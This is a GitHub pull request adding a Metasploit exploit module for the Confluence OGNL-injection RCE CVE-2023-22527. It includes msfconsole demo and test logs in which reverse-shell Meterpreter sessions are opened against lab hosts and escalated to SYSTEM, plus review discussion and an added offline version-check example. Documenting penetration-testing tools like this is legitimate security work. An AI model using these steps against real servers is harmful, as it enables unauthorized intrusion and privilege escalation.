
Add exploit for CVE-2023-22527 (Confluence RCE) #18734

Merged: 4 commits merged into rapid7:master on Jan 25, 2024

Conversation

@zeroSteiner zeroSteiner commented Jan 22, 2024

This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account. On Windows the service account is NT AUTHORITY\NETWORK SERVICE which can be trivially escalated to NT AUTHORITY\SYSTEM using the RPCSS namedpipe impersonation technique added in #14030 (getsystem -t 4).

Closes #18731

Verification

  • Follow the steps from the Setup section to create a test instance
  • Start msfconsole
  • Run: use exploit/multi/http/atlassian_confluence_rce_cve_2023_22527
  • Set the RHOSTS, PAYLOAD and payload-related options
  • Run the module

Demo

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set TARGET Windows\ Command 
TARGET => Windows Command
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > exploit

[*] Powershell command length: 4371
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Confluence version: 8.5.3
[*] Detected target platform: Windows Server 2019
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 9 opened (192.168.159.128:4444 -> 192.168.159.10:58923) at 2024-01-24 12:47:39 -0500

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > pwd
C:\Program Files\Atlassian\Confluence
meterpreter > 

@zeroSteiner zeroSteiner marked this pull request as ready for review January 24, 2024 17:50
@smcintyre-r7 smcintyre-r7 added the labels module, docs and rn-modules (release notes for new or majorly enhanced modules) on Jan 24, 2024
@zeroSteiner zeroSteiner changed the title Initial exploit for CVE-2023-22527 Add exploit for CVE-2023-22527 Jan 24, 2024
Review comment on the module metadata:

```ruby
},
'Notes' => {
  'Stability' => [CRASH_SAFE],
  'Reliability' => [REPEATABLE_SESSION],
```
Can the tester keep an eye out for stability when running this multiple times.

@jheysel-r7 jheysel-r7 self-assigned this Jan 25, 2024
@jheysel-r7 jheysel-r7 left a comment

Great module @zeroSteiner, one minor suggestion, testing was as expected on both Unix and Windows. I reran the module on each OS a couple times and the stability seemed fine to me.

Windows Command

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set target 1
target => 1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
payload => cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
[*] Sending stage (200774 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:49939) at 2024-01-25 12:57:40 -0500

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : WIN-2EEL7BRDUD8
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Unix Command

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set target 0
target => 0
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (24772 bytes) to 172.16.199.1
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:63558) at 2024-01-25 13:27:28 -0500

meterpreter > getuid
Server username: confluence
meterpreter > sysinfo
Computer        : 6bb0a19104ea
OS              : Linux 6.5.11-linuxkit #1 SMP PREEMPT_DYNAMIC Wed Dec  6 17:14:50 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >

Review comment on the target/platform compatibility check:

```ruby
end

unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
  fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
```
I hastily ran the module without switching to the appropriate target and appreciated the detail in this error message.

[-] Exploit aborted due to failure: no-target: The target platform 'Windows Server 2022' is incompatible with 'Unix Command'


Review comment on the check method:

```ruby
def check
  confluence_version = get_confluence_version
  return CheckCode::Unknown unless confluence_version
```
Suggested change
return CheckCode::Unknown unless confluence_version
return CheckCode::Unknown('Unable to determine the confluence version') unless confluence_version

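The pre-exploitation gating discussed in the PR description and in the two review threads above (the target/platform compatibility check and the return value of check), as an added stand-alone example that is not the module's or Metasploit's code: it extracts the Confluence version from a constructed page, decides a check result, and applies the same platform-versus-target rule the module uses. Assumed rather than taken from this page: the ajs-version-number meta tag as the place the version is read from, the affected range 8.0.0 through 8.5.3 with 8.5.4 as the first fixed release (from the vendor advisory, not from this PR), and the names SAMPLE_HTML, get_confluence_version, check, assert_target_compatible and NoTargetError.

```ruby
# Added example, not code from the Metasploit module. Re-implements the
# version/platform gating from the PR discussion as plain Ruby so it can be
# run offline: nothing is sent to a host and the HTML below is constructed.

# Constructed sample of a Confluence login page. The ajs-version-number meta
# tag as the version source is an assumption; the real get_confluence_version
# mixin from the PR is not reproduced here.
SAMPLE_HTML = <<~HTML
  <html><head>
  <meta name="ajs-version-number" content="8.5.3">
  <meta name="ajs-build-number" content="9109">
  </head><body>Log in to Confluence</body></html>
HTML

# Assumed affected range, taken from the vendor advisory rather than this
# page: 8.0.0 through 8.5.3, with 8.5.4 (and later, e.g. 8.6.0) fixed.
FIRST_VULNERABLE = Gem::Version.new('8.0.0')
FIRST_FIXED      = Gem::Version.new('8.5.4')

# Returns a Gem::Version, or nil when the page carries no recognisable version.
def get_confluence_version(html)
  match = html.match(/name="ajs-version-number"\s+content="([\d.]+)"/)
  match && Gem::Version.new(match[1])
end

# Mirrors the flow from the review thread: Unknown (with the suggested reason
# string) when the version cannot be determined, Safe when outside the assumed
# affected range, Appears otherwise. The module additionally confirms with a
# live OGNL probe ("Successfully tested OGNL injection"); that step is
# deliberately absent here, so Appears is a version-based verdict only.
def check(html)
  version = get_confluence_version(html)
  return [:Unknown, 'Unable to determine the confluence version'] unless version

  if version >= FIRST_VULNERABLE && version < FIRST_FIXED
    [:Appears, "Confluence #{version} is within the affected range"]
  else
    [:Safe, "Confluence #{version} is outside the affected range"]
  end
end

# Module targets and the platform key each one carries, as in the PR.
TARGETS = {
  'Unix Command'    => 'unix',
  'Windows Command' => 'win'
}.freeze

class NoTargetError < StandardError; end

# Same rule as the module: a detected platform string such as
# "Windows Server 2022" must agree with the selected target, otherwise abort
# with the message the reviewer quoted. Returns true when compatible.
def assert_target_compatible(confluence_platform, target_name)
  target_platform = TARGETS.fetch(target_name)
  platform_is_windows = confluence_platform.downcase.start_with?('win')
  unless platform_is_windows == (target_platform == 'win')
    raise NoTargetError,
          "The target platform '#{confluence_platform}' is incompatible with '#{target_name}'"
  end
  true
end

if $PROGRAM_NAME == __FILE__
  code, reason = check(SAMPLE_HTML)
  puts "check: #{code} (#{reason})"
  begin
    assert_target_compatible('Windows Server 2022', 'Unix Command')
  rescue NoTargetError => e
    puts "[-] Exploit aborted due to failure: no-target: #{e.message}"
  end
end
```

Run it as a script to see the same no-target abort the reviewer hit by leaving target 0 selected against a Windows host; swap the meta tag's content value to 8.5.4 or remove it to exercise the Safe and Unknown branches.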
@jheysel-r7

Testing the atlassian_confluence_namespace_ognl_injection update to use the get_confluence_version from the new mixin:

msf6 > use multi/http/atlassian_confluence_namespace_ognl_injection
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22527) > set rhost 172.16.199.134
rhost => 172.16.199.134
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set verbose true
verbose => true
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check

[*] Detected Confluence version: 8.5.1
[*] 172.16.199.134:8090 - The target is not exploitable. Failed to test OGNL injection.
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) >

@jheysel-r7 jheysel-r7 merged commit fe84c0d into rapid7:master Jan 25, 2024
34 checks passed
@jheysel-r7

Release Notes

This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.

@zeroSteiner zeroSteiner changed the title Add exploit for CVE-2023-22527 Add exploit for CVE-2023-22527 (Confluence RCE) Jan 29, 2024
Successfully merging this pull request may close these issues.

Atlassian Confluence - Remote Code Execution (CVE-2023-22527)